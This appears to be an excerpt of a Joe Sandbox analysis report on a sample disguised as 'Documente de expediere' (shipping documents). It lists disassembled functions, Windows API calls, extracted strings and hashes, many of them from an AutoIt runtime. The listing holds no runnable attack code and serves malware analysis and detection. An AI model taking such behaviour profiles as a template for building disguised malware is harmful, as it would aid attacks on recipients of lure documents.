                                                • SetWindowTextW.USER32(?,?), ref: 006EC4FD
                                                • GetDlgItem.USER32(?,000003EA), ref: 006EC512
                                                • SetWindowTextW.USER32(00000000,?), ref: 006EC518
                                                • GetDlgItem.USER32(?,000003E9), ref: 006EC528
                                                • SetWindowTextW.USER32(00000000,?), ref: 006EC52E
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006EC54F
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006EC569
                                                • GetWindowRect.USER32(?,?), ref: 006EC572
                                                • SetWindowTextW.USER32(?,?), ref: 006EC5DD
                                                • GetDesktopWindow.USER32 ref: 006EC5E3
                                                • GetWindowRect.USER32(00000000), ref: 006EC5EA
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006EC636
                                                • GetClientRect.USER32(?,?), ref: 006EC643
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006EC668
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006EC693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: d52d453a1377952d192702cfd08e0e3d235f1f52d82ff9a5497c3ed171040d71
                                                • Instruction ID: 5eeb33b0a499483e05a2e65a1b3bf4a393c29fc462b8b3008b2407a2e566b532
                                                • Opcode Fuzzy Hash: d52d453a1377952d192702cfd08e0e3d235f1f52d82ff9a5497c3ed171040d71
                                                • Instruction Fuzzy Hash: 48518E31900709AFDB20DFA9DD85BAEBBF6FF04715F008528E686A26A0C774A915CB44
                                                Function 0071A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0071A4C8
                                                • DestroyWindow.USER32(?,?), ref: 0071A542
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0071A5BC
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0071A5DE
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A5F1
                                                • DestroyWindow.USER32(00000000), ref: 0071A613
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00690000,00000000), ref: 0071A64A
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A663
                                                • GetDesktopWindow.USER32 ref: 0071A67C
                                                • GetWindowRect.USER32(00000000), ref: 0071A683
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0071A69B
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0071A6B3
                                                  • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: 34e8b531ee459f84cdd3ff4a9687fd20fee6f6835b85c24da0d64a04367e5b2e
                                                • Instruction ID: 2c56a7cb67c439dd9bb38a7f8cdf8e8c0073db47b0d7c509e6625a306732128a
                                                • Opcode Fuzzy Hash: 34e8b531ee459f84cdd3ff4a9687fd20fee6f6835b85c24da0d64a04367e5b2e
                                                • Instruction Fuzzy Hash: 7371A171240305AFD720DF28CC45FAA7BE6FB88305F48852DF985872A0D779E946CB56
                                                Function 00714619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007146AB
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007146F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: 7dc2e5c038cbe5be7bb673a108f0268233cc9b13e8bf78ccdcf855f8b796c63a
                                                • Instruction ID: e32b1081c513149846e5f3004647a514a53f63cc0ea0bc6e3a7e95c671db0a27
                                                • Opcode Fuzzy Hash: 7dc2e5c038cbe5be7bb673a108f0268233cc9b13e8bf78ccdcf855f8b796c63a
                                                • Instruction Fuzzy Hash: 79917F742043019FCF54EF28C451AAEB7A6AF54314F14846CF8965B7E2CB38ED8ACB95
                                                Function 0071BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0071BB6E
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00719431), ref: 0071BBCA
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071BC03
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0071BC46
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071BC7D
                                                • FreeLibrary.KERNEL32(?), ref: 0071BC89
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0071BC99
                                                • DestroyIcon.USER32(?,?,?,?,?,00719431), ref: 0071BCA8
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0071BCC5
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0071BCD1
                                                  • Part of subcall function 006B313D: __wcsicmp_l.LIBCMT ref: 006B31C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 1212759294-1154884017
                                                • Opcode ID: a218642eaf4845ed76fc5e0529e9d273709e00430070bf1c630996f3ca2be888
                                                • Instruction ID: cfaffd941a43bca8babcc7677dcc27953b76563ac74d4b7101032a8b6141117c
                                                • Opcode Fuzzy Hash: a218642eaf4845ed76fc5e0529e9d273709e00430070bf1c630996f3ca2be888
                                                • Instruction Fuzzy Hash: C761A0B1600619BAEB24DF69CC85FFE77ACFB08710F108219F915D61D0DB789990DBA0
                                                Function 006FA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,0071FB78), ref: 006FA0FC
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 006FA11E
                                                • __swprintf.LIBCMT ref: 006FA177
                                                • __swprintf.LIBCMT ref: 006FA190
                                                • _wprintf.LIBCMT ref: 006FA246
                                                • _wprintf.LIBCMT ref: 006FA264
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%r
                                                • API String ID: 311963372-3687378605
                                                • Opcode ID: 7f7e45f883cfb6a0b02272c416b0e48cc708a31885785c9fb3a11abb1dfec14b
                                                • Instruction ID: ad43053e72bc830bdae87d7bf89304c546a81e48bf1c1b82285a3f6dc19415a6
                                                • Opcode Fuzzy Hash: 7f7e45f883cfb6a0b02272c416b0e48cc708a31885785c9fb3a11abb1dfec14b
                                                • Instruction Fuzzy Hash: 4851BFB2904209BBCF55EBE0CD82EEEB77AAF04300F144169F505721A1EB356F48DB69
                                                Function 006FA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • CharLowerBuffW.USER32(?,?), ref: 006FA636
                                                • GetDriveTypeW.KERNEL32 ref: 006FA683
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA6CB
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA702
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA730
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 8b740996d6e9844084cf7df570287bffd71cb41bc32b5d88ca56e10fd6e1bd72
                                                • Instruction ID: fe2991006d135a7366c6812f835a4c33d68d4e9327baf68273b16832b6cf9736
                                                • Opcode Fuzzy Hash: 8b740996d6e9844084cf7df570287bffd71cb41bc32b5d88ca56e10fd6e1bd72
                                                • Instruction Fuzzy Hash: 63515FB51143059FCB40EF14C88186AB7FAFF84718F04896CF89A576A1DB35EE0ACB56
                                                Function 006FA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006FA47A
                                                • __swprintf.LIBCMT ref: 006FA49C
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 006FA4D9
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006FA4FE
                                                • _memset.LIBCMT ref: 006FA51D
                                                • _wcsncpy.LIBCMT ref: 006FA559
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006FA58E
                                                • CloseHandle.KERNEL32(00000000), ref: 006FA599
                                                • RemoveDirectoryW.KERNEL32(?), ref: 006FA5A2
                                                • CloseHandle.KERNEL32(00000000), ref: 006FA5AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: fd51ff696b1445ff6ddeffff9b7234993a8b46ce2c3edc247f9d991878ff16ed
                                                • Instruction ID: c92034bc6b9f856eac8fd9b0348c8340d2877f594daacd11039482cecd1011ec
                                                • Opcode Fuzzy Hash: fd51ff696b1445ff6ddeffff9b7234993a8b46ce2c3edc247f9d991878ff16ed
                                                • Instruction Fuzzy Hash: A83191B1500119AADB21DFA4DC48FFB77BDEF88701F1081BAF608D6160E67496448B29
                                                Function 006FDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 006FDC7B
                                                • _wcscat.LIBCMT ref: 006FDC93
                                                • _wcscat.LIBCMT ref: 006FDCA5
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006FDCBA
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FDCCE
                                                • GetFileAttributesW.KERNEL32(?), ref: 006FDCE6
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 006FDD00
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FDD12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                • String ID: *.*
                                                • API String ID: 34673085-438819550
                                                • Opcode ID: 54e490afdbb89d5d62789d9a9dffb690bd053750fc6c9cd2bd2a0ce14821bdac
                                                • Instruction ID: 2bd8018be41b81706e963b8d505ab59a143b2e0267387b5d1d9fd002fb56ab4a
                                                • Opcode Fuzzy Hash: 54e490afdbb89d5d62789d9a9dffb690bd053750fc6c9cd2bd2a0ce14821bdac
                                                • Instruction Fuzzy Hash: 7281A2B15042099FCB60EF64C8459BEB7EBBF89350F19882EF989C7350E630E945CB52
                                                Function 0071C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0071C4EC
                                                • GetFocus.USER32 ref: 0071C4FC
                                                • GetDlgCtrlID.USER32(00000000), ref: 0071C507
                                                • _memset.LIBCMT ref: 0071C632
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0071C65D
                                                • GetMenuItemCount.USER32(?), ref: 0071C67D
                                                • GetMenuItemID.USER32(?,00000000), ref: 0071C690
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0071C6C4
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0071C70C
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0071C744
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0071C779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 2f516f20ea260aadaa9b8897d1ac8463c8d0195fffdd0bfcd0dc9fa74277a71c
                                                • Instruction ID: f220f5fc7d1396b6a053a0b79ea23040d8282a5c5b95cc6abb747fde24d151a2
                                                • Opcode Fuzzy Hash: 2f516f20ea260aadaa9b8897d1ac8463c8d0195fffdd0bfcd0dc9fa74277a71c
                                                • Instruction Fuzzy Hash: 6981BD70248301AFD711CF58C885AEBBBE9FB88314F10492DF995972D1D778E985CBA2
                                                Function 006E83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E8766
                                                  • Part of subcall function 006E874A: GetLastError.KERNEL32(?,006E822A,?,?,?), ref: 006E8770
                                                  • Part of subcall function 006E874A: GetProcessHeap.KERNEL32(00000008,?,?,006E822A,?,?,?), ref: 006E877F
                                                  • Part of subcall function 006E874A: HeapAlloc.KERNEL32(00000000,?,006E822A,?,?,?), ref: 006E8786
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E879D
                                                  • Part of subcall function 006E87E7: GetProcessHeap.KERNEL32(00000008,006E8240,00000000,00000000,?,006E8240,?), ref: 006E87F3
                                                  • Part of subcall function 006E87E7: HeapAlloc.KERNEL32(00000000,?,006E8240,?), ref: 006E87FA
                                                  • Part of subcall function 006E87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006E8240,?), ref: 006E880B
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E8458
                                                • _memset.LIBCMT ref: 006E846D
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E848C
                                                • GetLengthSid.ADVAPI32(?), ref: 006E849D
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 006E84DA
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E84F6
                                                • GetLengthSid.ADVAPI32(?), ref: 006E8513
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006E8522
                                                • HeapAlloc.KERNEL32(00000000), ref: 006E8529
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E854A
                                                • CopySid.ADVAPI32(00000000), ref: 006E8551
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E8582
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E85A8
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E85BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: db54e465e76a3f01fe674ae6802f7ce63aa4435b0ec6c17bbb77f24d2121416e
                                                • Instruction ID: 0b17c7a5704bfc327aa0c36641ff5c49dbf46fa074a1a2ba48b162cccbc92f9e
                                                • Opcode Fuzzy Hash: db54e465e76a3f01fe674ae6802f7ce63aa4435b0ec6c17bbb77f24d2121416e
                                                • Instruction Fuzzy Hash: 07613971901249AFDF00DFA5DC45AEEBBBAFF04300F148269F819AB291DB359A05CF64
                                                Function 0070762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007076A2
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007076AE
                                                • CreateCompatibleDC.GDI32(?), ref: 007076BA
                                                • SelectObject.GDI32(00000000,?), ref: 007076C7
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0070771B
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00707757
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0070777B
                                                • SelectObject.GDI32(00000006,?), ref: 00707783
                                                • DeleteObject.GDI32(?), ref: 0070778C
                                                • DeleteDC.GDI32(00000006), ref: 00707793
                                                • ReleaseDC.USER32(00000000,?), ref: 0070779E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: a072deeb221f004e5c939af918d78ab3c751566b9799548a73599798fb7ebfdf
                                                • Instruction ID: 61813494ceb71530d52039c5f9749c0bb1660b65554d7953f5ceecf4499364fc
                                                • Opcode Fuzzy Hash: a072deeb221f004e5c939af918d78ab3c751566b9799548a73599798fb7ebfdf
                                                • Instruction Fuzzy Hash: C0513875904209EFCB15CFA8CC84EAEBBF9EF48310F14C52DF94AA7291D635A940CB64
                                                Function 00696BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006B0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00696C6C,?,00008000), ref: 006B0BB7
                                                  • Part of subcall function 006948AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006948A1,?,?,006937C0,?), ref: 006948CE
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696D0D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00696E5A
                                                  • Part of subcall function 006959CD: _wcscpy.LIBCMT ref: 00695A05
                                                  • Part of subcall function 006B387D: _iswctype.LIBCMT ref: 006B3885
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-1018226102
                                                • Opcode ID: 40a84bc427d03a215c910216bc219d6ef3f7730d4cdb5a806eebb7227ea4b3b1
                                                • Instruction ID: 87f0ef3829b4bb2e2e50c251f582dc48869d4bbd469637986867cd4ab7540bd0
                                                • Opcode Fuzzy Hash: 40a84bc427d03a215c910216bc219d6ef3f7730d4cdb5a806eebb7227ea4b3b1
                                                • Instruction Fuzzy Hash: B9029B701083419FCB64EF24C881AAFBBEAEF98314F14491DF48A976A1DB31D949CB46
                                                Function 006945DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006945F9
                                                • GetMenuItemCount.USER32(00756890), ref: 006CD7CD
                                                • GetMenuItemCount.USER32(00756890), ref: 006CD87D
                                                • GetCursorPos.USER32(?), ref: 006CD8C1
                                                • SetForegroundWindow.USER32(00000000), ref: 006CD8CA
                                                • TrackPopupMenuEx.USER32(00756890,00000000,?,00000000,00000000,00000000), ref: 006CD8DD
